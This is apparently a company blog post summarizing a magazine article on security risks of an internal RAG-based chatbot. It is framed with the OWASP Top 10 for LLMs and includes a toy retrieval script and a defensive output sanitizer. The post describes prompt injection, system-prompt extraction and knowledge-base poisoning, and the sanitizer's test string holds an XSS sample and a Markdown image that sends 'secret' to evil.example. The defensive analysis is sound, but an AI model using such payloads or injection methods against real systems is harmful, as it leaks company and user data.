In our last blog post, we addressed the fundamental security threats associated with Large Language Models (LLMs) and showed why proven security practices must also be applied to this new technology. In our technical article, which appears in the current issue of JavaSPEKTRUM, we go one step further: using a practical scenario, we analyze typical security risks of LLM-based chatbots, with a special focus on Retrieval-Augmented Generation (RAG) systems. To do so, we combine the established risk catalog of the OWASP Top 10 for LLMs with the OWASP Threat Modeling Process.

The Scenario: An Internal Chatbot with a RAG System



Let's imagine a typical example of LLM integration: A company uses an internal chatbot that serves employees as a knowledge database for wiki content and code documentation. The architecture consists of several key components: an LLM agent, an externally connected model, and a RAG system (highlighted in blue), which provides the wiki content and code documentation for queries and stores it in a vector database:



When an employee queries the chatbot, the request is first received by the LLM agent. The agent then calls the RAG retriever, which searches the RAG database for the documents most relevant to the request, a step known as semantic search. The retrieved documents are added as context to the employee's request and passed to the LLM, which uses that context to generate a relevant answer.
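The retrieval flow described above can be sketched in a few lines of Python. This is a minimal illustration under stated assumptions, not the implementation from the article: `embed`, `retrieve`, and `build_prompt` are hypothetical names, and the bag-of-words `embed` function is only a toy stand-in for a real embedding model and vector database.

```python
import math
from collections import Counter


def embed(text: str) -> Counter:
    """Toy stand-in for an embedding model: a bag-of-words vector.

    Assumption: a real system would call an embedding model here.
    """
    return Counter(text.lower().split())


def cosine(a: Counter, b: Counter) -> float:
    """Cosine similarity between two sparse word-count vectors."""
    dot = sum(a[token] * b[token] for token in a)
    norm_a = math.sqrt(sum(v * v for v in a.values()))
    norm_b = math.sqrt(sum(v * v for v in b.values()))
    return dot / (norm_a * norm_b) if norm_a and norm_b else 0.0


def retrieve(query: str, documents: list[str], k: int = 2) -> list[str]:
    """Return the k documents most similar to the query."""
    query_vector = embed(query)
    ranked = sorted(
        documents,
        key=lambda doc: cosine(query_vector, embed(doc)),
        reverse=True,
    )
    return ranked[:k]


def build_prompt(query: str, documents: list[str], k: int = 2) -> str:
    """Add the retrieved documents as context to the user's request."""
    context = "\n".join(f"- {doc}" for doc in retrieve(query, documents, k))
    return f"Context:\n{context}\n\nQuestion: {query}"


docs = [
    "The deployment pipeline runs on Jenkins",
    "Vacation requests go through the HR portal",
    "Jenkins pipeline credentials are rotated monthly",
]
prompt = build_prompt("how does the deployment pipeline work", docs)
```

Note that the retrieved text ends up in the same prompt as the user's question. Whatever is stored in the knowledge base therefore reaches the model as input, which is why the contents of the RAG database matter for the threat analysis that follows.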

The Structured Threat Analysis Shows Us the Way

Chatbots with a RAG connection access sensitive company data, which makes them particularly attractive targets for attackers. In our technical article, we follow the OWASP Threat Modeling Process to identify the assets that need special protection, such as internal documents, code, the vector database, the availability of the application, and the cost of using the external model. On this basis, we examine five central risks from the OWASP Top 10 for LLMs and illustrate them with concrete, practical examples:

- Prompt Injection: Prompt injection is one of the biggest threats to LLM applications and is often the gateway for exploiting other vulnerabilities. Attackers deliberately craft prompts to induce the model to produce unwanted outputs, such as the disclosure of sensitive information. What makes it particularly dangerous is that, according to the current state of research, no mechanism offers complete protection against prompt injection, because user inputs and system instructions cannot be strictly separated at the technical level.

- Disclosure of Sensitive Information: This describes the fundamental risk that an attacker gains access to sensitive data in our LLM application. For example, an attacker can use prompt injection to try to extract confidential data from internal knowledge databases or code documentation. Another example is sensitive chat data that ends up in inadequately protected log files.

- Disclosure of the System Prompt: System prompts are used to contextualize user requests and control the responses of the LLM. For example, they may contain information about the structure of the knowledge database to make the response more relevant. The system prompt can also be used to prevent certain topics of conversation, such as hate speech or insults. If an attacker manages to disclose the system prompt, for example by means of prompt injection, they can launch more targeted attacks and specifically bypass protection mechanisms.

- Insecure Output Handling: This risk refers to the inadequate validation of LLM outputs. If outputs are passed unchecked to downstream systems or rendered in the browser, an attacker can, for example, trigger cross-site scripting (XSS) or exfiltrate data via code embedded in Markdown.

- Vulnerabilities in the Embedding Process: Attackers with write access to the source data (e.g. the internal wiki) can use the embedding process to inject malicious content. This content is then stored in the vector database and can cause incorrect or manipulated information to be returned in response to queries.
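To make the output-handling risk from the list above more concrete, here is a minimal Python sketch of treating LLM output as untrusted before it is displayed. It is an illustration under assumptions, not a complete defense and not the approach from the article: the function name `sanitize_llm_output`, the allowlist `ALLOWED_IMAGE_HOSTS`, and the host `wiki.example.internal` are hypothetical. A production application would typically rely on the sanitization features of its rendering framework as well.

```python
import html
import re
from urllib.parse import urlparse

# Hypothetical allowlist: hosts from which the chat UI may load images.
ALLOWED_IMAGE_HOSTS = {"wiki.example.internal"}

# Matches Markdown images of the form ![alt](url "optional title").
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")


def sanitize_llm_output(text: str) -> str:
    """Neutralize HTML and untrusted Markdown images in LLM output."""

    def replace_image(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        host = urlparse(url).hostname or ""
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # keep images from trusted hosts
        # An image URL on a foreign host could carry data out of the chat
        # in its query string, so the image is dropped.
        return f"[image removed: {alt}]"

    without_untrusted_images = MD_IMAGE.sub(replace_image, text)
    # Escape HTML so that embedded <script> tags are shown as text.
    return html.escape(without_untrusted_images)


raw = "Hi <script>alert(1)</script> ![x](https://evil.example/p.png?d=secret)"
safe = sanitize_llm_output(raw)
```

The design choice here is to allow only what is known to be safe (an allowlist of image hosts, escaped text) instead of trying to list everything that is dangerous. The same mindset applies to the other risks in the list: content coming from the model or from the knowledge base is handled like any other untrusted input.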

Conclusion

LLM-based chatbots offer companies great added value, but they also bring new security risks, and the use of RAG systems further increases the complexity. With established methods such as the OWASP Top 10 for LLMs and the OWASP Threat Modeling Process, these risks can be systematically identified and addressed. It is crucial to understand the components of the LLM application in use, to address the risks systematically, and to implement the protective measures consistently. In the second part of our technical article, we analyze further risks and present practical strategies for securing the example application.

The article appeared in the May 2025 issue of JavaSPEKTRUM from SIGS.DE.